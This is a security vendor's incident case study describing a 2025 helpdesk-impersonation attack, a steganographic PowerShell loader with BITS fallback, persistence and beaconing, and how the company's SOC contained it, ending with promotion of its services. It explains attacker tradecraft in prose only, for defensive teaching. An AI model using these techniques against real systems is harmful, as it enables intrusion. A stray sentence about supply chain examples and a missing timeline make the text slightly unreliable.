Inside an Attack: A Minute By Minute Timeline of Attack Detection & Incident Response

In cyber security, even the most robust technical defences can be undermined by a single successful social engineering attack.

This was the case in July 2025, when a UK-based organisation became the target of a well-planned impersonation campaign. The attacker did not rely on brute force or exploit vulnerabilities in firewalls; instead, they exploited trust - posing as an internal helpdesk contact. Within minutes, this simple deception gave them full remote access to a corporate device.

What followed was a carefully orchestrated attempt to deliver and persist malware using steganographic techniques, privilege checks, and multiple fallback mechanisms. However, thanks to rapid alerts from our MXDR platform, coupled with immediate action from PureCyber’s 24/7 Security Operations Centre (SOC), the attack was contained before it could escalate.

This incident serves as a case study in both the sophistication of modern threat actors and the effectiveness of having a trusted cyber security partner who can provide constant vigilance, rapid response, and expert remediation.

Timeline of Events

A precise timeline highlights just how quickly the attack unfolded - and how rapidly it was detected and contained.We’ve highlighted three real-world examples of supply chain compromise:

In the span of just 11 minutes, the attacker moved from initial contact to deploying malicious files. Without immediate detection by PureCyber’s SOC, the malware could have established persistence and begun exfiltrating sensitive data.

Technical Breakdown: How the Attack Unfolded

The attacker relied on a PowerShell-based framework to deploy, hide, and persist malicious payloads. The sophistication of this script underscores the evolution of modern attack methods, which blend social engineering with advanced technical tactics.

Key Components of the Attack

1. Payload Delivery
   The attacker began by downloading malicious content from external domains under their control. Including a steganographic payload hidden within an image file hosted on one of these external domains. The use of steganography demonstrates how attackers are increasingly hiding malware inside seemingly harmless files to bypass traditional detection.

2. Privilege Detection
   Once delivered, the script checked whether the compromised account had administrative rights, using the net session command. This step is critical for attackers, as admin privileges allow malware to disable security tools, install additional payloads, and move laterally within the network.

3. Payload Extraction
   The script decrypted and decompressed the hidden data from the image file, dropping the malicious components into a concealed location within APPDATA\MsEdgeServices. By using directories that mimic legitimate software, attackers increase the likelihood that their activity will blend into normal system behaviour and avoid detection.

4. Fallback Mechanism
   Recognising that steganographic delivery can fail, the script included a robust contingency plan. If the hidden payload could not be extracted, it would instead download secondary files - such as Edge_bg.exe and HTCTL32.DLL - using the Background Intelligent Transfer Service (BITS), a legitimate Windows process often abused by attackers to evade detection.

5. Execution & Persistence
   The malicious file Edge_bg.exe was then executed, while persistence was achieved through scheduled tasks or registry run keys. This persistence ensured that even if the user rebooted their device, the malware would automatically relaunch, giving the attacker ongoing access.

6. Beaconing
   Finally, the compromised device began communicating back to the attacker’s command-and-control infrastructure at the external domain under their control, sending device and user information via HTTP GET requests. This initial beaconing stage often precedes further malicious activity, such as data theft, ransomware deployment, or the introduction of additional malware strains.

How the Threat Was Contained

The attack was ultimately thwarted thanks to a combination of proactive defence tools and the immediate action of PureCyber’s 24/7 SOC.

• Our internal endpoint detection system triggered alerts when suspicious PowerShell commands executed on the endpoint, flagging the anomaly.

• Firewall simultaneously detected attempts to connect to a malicious domain, reinforcing that the activity was not legitimate.

• PureCyber’s SOC analysts received these alerts in real time, rapidly investigated the activity, and isolated the endpoint to prevent further spread. They also blocked outbound communications to the attacker’s servers.

• The suspicious file AuroraVista.zip was quarantined for deeper forensic analysis, ensuring it could not run or propagate across the network.

Without a dedicated SOC monitoring systems around the clock, this incident could easily have escalated into a serious breach. The attacker’s ability to gain remote access, deliver hidden payloads, and set up persistence mechanisms meant that even a small delay in response might have given them time to steal sensitive data or deploy ransomware.

Outcome and Lessons Learned

The incident was contained within minutes, but it offers several key lessons for organisations:

• Social engineering remains the biggest threat - The attacker gained entry by convincing an employee to authorise remote access, proving once again that human trust is often the easiest door to open. Ongoing employee training and awareness are critical.

• Speed is everything in cyber defence - In this case, alerts were raised at 13:21, and the attacker was cut off by 13:25. Without that four-minute response window, persistence mechanisms may have taken hold, making remediation far more complex.

• Layered defences work - Endpoint protection, firewall monitoring, and SOC oversight all played distinct but complementary roles. This kind of defence-in-depth model ensures that if one control is bypassed, others can still stop the attack.

• The human element in defence is as important as the human weakness in attack - Just as the attacker exploited human behaviour to gain entry, PureCyber’s human analysts provided the critical decision-making needed to interpret alerts, isolate systems, and contain the threat.

• 24/7 SOC services are essential - Cyber criminals do not keep office hours, and attacks can happen at any moment. Without a trusted partner monitoring systems continuously, organisations risk discovering breaches hours - or even days, too late.

What Can You Do to Prevent Attacks Like These?

While the incident was successfully contained, it highlights several steps that other organisations can take to strengthen their defences and reduce the likelihood of a similar breach:

• Cyber Awareness Training
  Social engineering relies on exploiting human trust. Regular training helps employees recognise red flags such as unusual helpdesk requests, pressure tactics, or instructions to use unfamiliar software. Simulated phishing and vishing exercises can further embed this awareness.

• Restrict or Remove Unnecessary Applications
  Tools such as Microsoft Quick Assist, while convenient, introduce unnecessary risk by enabling remote access. If not essential to business operations, these applications should be uninstalled, or their use tightly controlled to prevent misuse by attackers.

• Harden Endpoint Configurations
  Reducing “bloatware” and disabling unused services decreases the potential attack surface. A leaner, better-managed endpoint environment reduces the number of tools attackers can exploit.

• Enforce the Principle of Least Privilege
  Limiting administrative rights ensures that even if an attacker gains initial access, their ability to escalate privileges and deploy malware is restricted.

• Invest in 24/7 Monitoring and Response
  As this case demonstrated, speed is critical. A dedicated SOC service provides constant vigilance, ensuring that alerts are not only generated but acted upon in real time.

By combining awareness, technical hardening, and continuous monitoring, organisations can significantly reduce their risk exposure and increase resilience against sophisticated social engineering campaigns.

Why Every Organisation Needs a Cyber Security Partner

This case underscores the critical truth that no organisation is immune to social engineering. Attackers know that convincing a user to click, download, or authorise access can bypass even the strongest technical perimeter. The real question is not if a breach attempt will occur, but whether it will be detected and contained quickly enough to prevent damage.

For Steatite, the presence of PureCyber’s 24/7 SOC meant the difference between a thwarted attempt and a successful compromise. Within minutes, analysts identified the attack, isolated the threat, and prevented escalation. Beyond technology, it was expertise, vigilance, and decisive action that turned a potential crisis into a manageable incident.

For other organisations, this serves as a powerful reminder: you cannot defend alone.

Cyber security is no longer just about firewalls and antivirus software - it is about having a strategic partner who provides constant monitoring, rapid response, and expert guidance. By investing in services like those provided by PureCyber, organisations can ensure that when attackers strike, they are met with immediate resistance, minimising impact and protecting both operations and reputation.

Is Your Cyber Security Stressing You Out in 2025?

PureCyber Has All The Resources You Need to Stay One Step Ahead.

From free online webinars in our Autumn Webinar Series, to AI threats, essential checklists and landscape reports, we’ve got you covered.

Discover expert-curated insights, tools, and resources to strengthen your organisation’s cyber resilience during the busiest season for attacks. The first webinar in our Autumn Series, Crisis Unfolding: Why Leaders Must Own Incident Response will walk you through the first critical few hours of a cyber incident using a realistic timeline - revealing exactly what you need to know to create an effective incident response plan.

You can explore further details about our Autumn Webinar Series by clicking the button below - three live, consecutive, monthly webinars covering cyber security from different perspectives and led by our expert team of cyber specialists.

How Can PureCyber Help?

The PureCyber team are here to take over the burden of your cyber security and ensure your organisation’s data remains secure and well managed, with proactive monitoring and real-time threat intelligence - providing you with a comprehensive and reliable cyber department to support you in all aspects of your security efforts, including: 24/7 Security Operations Centre (SOC) services, Managed Detection & Response (MDR/EDR),Threat Exposure Management (TEM) & Brand Protection Services & Penetration Testing.

PureCyber is recognised as an Assured Service Provider by the NCSC to offer governance and compliance consultancy services/audits. Contact our team of compliance experts to enquire about our full range of Governance Support - including Cyber Essentials, ISO 27001, FISMA, SOC1 and SOC2 standards.

Get in touch or book a demo for more information on our services and how we can safeguard your organisation with our expert cyber security solutions.

Email: info@purecyber.com Call: 0800 368 9397